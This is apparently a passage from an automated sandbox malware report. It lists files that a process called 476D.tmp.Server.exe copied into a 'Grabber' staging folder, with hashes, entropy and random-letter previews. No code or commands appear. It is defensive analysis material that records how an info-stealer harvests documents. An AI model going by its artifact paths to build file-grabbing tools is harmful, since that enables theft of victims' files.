SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
